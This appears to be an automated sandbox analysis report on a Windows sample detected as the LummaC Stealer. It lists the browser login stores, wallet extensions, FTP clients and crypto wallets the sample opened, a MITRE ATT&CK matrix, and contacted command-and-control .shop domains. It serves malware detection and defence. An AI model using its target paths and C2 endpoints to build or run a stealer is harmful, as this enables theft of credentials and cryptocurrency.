            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: C:\Users\user\Desktop\7Y18r(97).exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
            Source: Yara matchFile source: 00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.1640181429.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 7Y18r(97).exe PID: 7724, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: 7Y18r(97).exe PID: 7724, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		12
            Virtualization/Sandbox Evasion            		2
            OS Credential Dumping            		131
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory12
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol41
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		Logon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets12
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU0%URL Reputationsafe
            http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
            http://ocsp.sectigo.com00%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
            https://sectigo.com/CPS00%URL Reputationsafe
            http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://upx.sf.net0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u0%URL Reputationsafe
            https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
            declaredczxi.shop100%Avira URL Cloudmalware
            applyzxcksdia.shop100%Avira URL Cloudmalware
            https://closedjuruwk.shop/apiE#0%Avira URL Cloudsafe
            https://closedjuruwk.shop/api100%Avira URL Cloudmalware
            bindceasdiwozx.shop100%Avira URL Cloudmalware
            https://closedjuruwk.shop:443/apiMicrosoft0%Avira URL Cloudsafe
            https://closedjuruwk.shop:443/api100%Avira URL Cloudmalware
            https://closedjuruwk.shop/tyg0%Avira URL Cloudsafe
            https://closedjuruwk.shop/u0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://closedjuruwk.shop/o0%Avira URL Cloudsafe
            conformfucdioz.shop100%Avira URL Cloudmalware
            closedjuruwk.shop0%Avira URL Cloudsafe
            catchddkxozvp.shop100%Avira URL Cloudmalware
            replacedoxcjzp.shop100%Avira URL Cloudmalware
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            https://closedjuruwk.shop/W0%Avira URL Cloudsafe
            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe440%Avira URL Cloudsafe
            https://closedjuruwk.shop/M0%Avira URL Cloudsafe
            https://closedjuruwk.shop/0%Avira URL Cloudsafe
            https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.0%Avira URL Cloudsafe
            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta0%Avira URL Cloudsafe
            contemplateodszsv.shop100%Avira URL Cloudmalware
            https://closedjuruwk.shop/apiew0%Avira URL Cloudsafe
            https://closedjuruwk.shop/api?100%Avira URL Cloudmalware
            https://closedjuruwk.shop/)0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            closedjuruwk.shop
            		188.114.97.3
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              applyzxcksdia.shoptrue
              • Avira URL Cloud: malware
              		unknown
              bindceasdiwozx.shoptrue
              • Avira URL Cloud: malware
              		unknown
              declaredczxi.shoptrue
              • Avira URL Cloud: malware
              		unknown
              https://closedjuruwk.shop/apifalse
              • Avira URL Cloud: malware
              		unknown
              conformfucdioz.shoptrue
              • Avira URL Cloud: malware
              		unknown
              closedjuruwk.shoptrue
              • Avira URL Cloud: safe
              		unknown
              replacedoxcjzp.shoptrue
              • Avira URL Cloud: malware
              		unknown
              catchddkxozvp.shoptrue
              • Avira URL Cloud: malware
              		unknown
              contemplateodszsv.shoptrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://duckduckgo.com/chrome_newtab7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU7Y18r(97).exefalse
              • URL Reputation: safe
              		unknown
              https://duckduckgo.com/ac/?q=7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl07Y18r(97).exefalse
              • URL Reputation: safe
              		unknown
              http://ocsp.sectigo.com07Y18r(97).exefalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#7Y18r(97).exefalse
              • URL Reputation: safe
              		unknown
              https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://closedjuruwk.shop:443/api7Y18r(97).exe, 00000000.00000002.1755775097.00000000033C6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://closedjuruwk.shop/apiE#7Y18r(97).exe, 00000000.00000002.1752535595.0000000000880000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://x1.c.lencr.org/07Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://x1.i.lencr.org/07Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://closedjuruwk.shop:443/apiMicrosoft7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://closedjuruwk.shop/tyg7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://closedjuruwk.shop/u7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://support.mozilla.org/products/firefoxgro.all7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://closedjuruwk.shop/o7Y18r(97).exe, 00000000.00000003.1659282528.0000000000891000.00000004.00000020.00020000.00000000.sdmp, 7Y18r(97).exe, 00000000.00000003.1690285976.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://sectigo.com/CPS07Y18r(97).exefalse
              • URL Reputation: safe
              		unknown
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://closedjuruwk.shop/e7Y18r(97).exe, 00000000.00000003.1588102337.0000000000878000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#7Y18r(97).exefalse
                • URL Reputation: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://crl.rootca1.amazontrust.com/rootca1.crl07Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://upx.sf.netAmcache.hve.5.drfalse
                • URL Reputation: safe
                		unknown
                http://ocsp.rootca1.amazontrust.com0:7Y18r(97).exe, 00000000.00000003.1624437142.00000000033DC000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://closedjuruwk.shop/W7Y18r(97).exe, 00000000.00000002.1753654051.00000000008A0000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.7Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/7Y18r(97).exe, 00000000.00000003.1600766320.00000000033F6000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br7Y18r(97).exe, 00000000.00000003.1625836940.00000000034E4000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe447Y18r(97).exe, 00000000.00000003.1626253533.00000000008D6000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
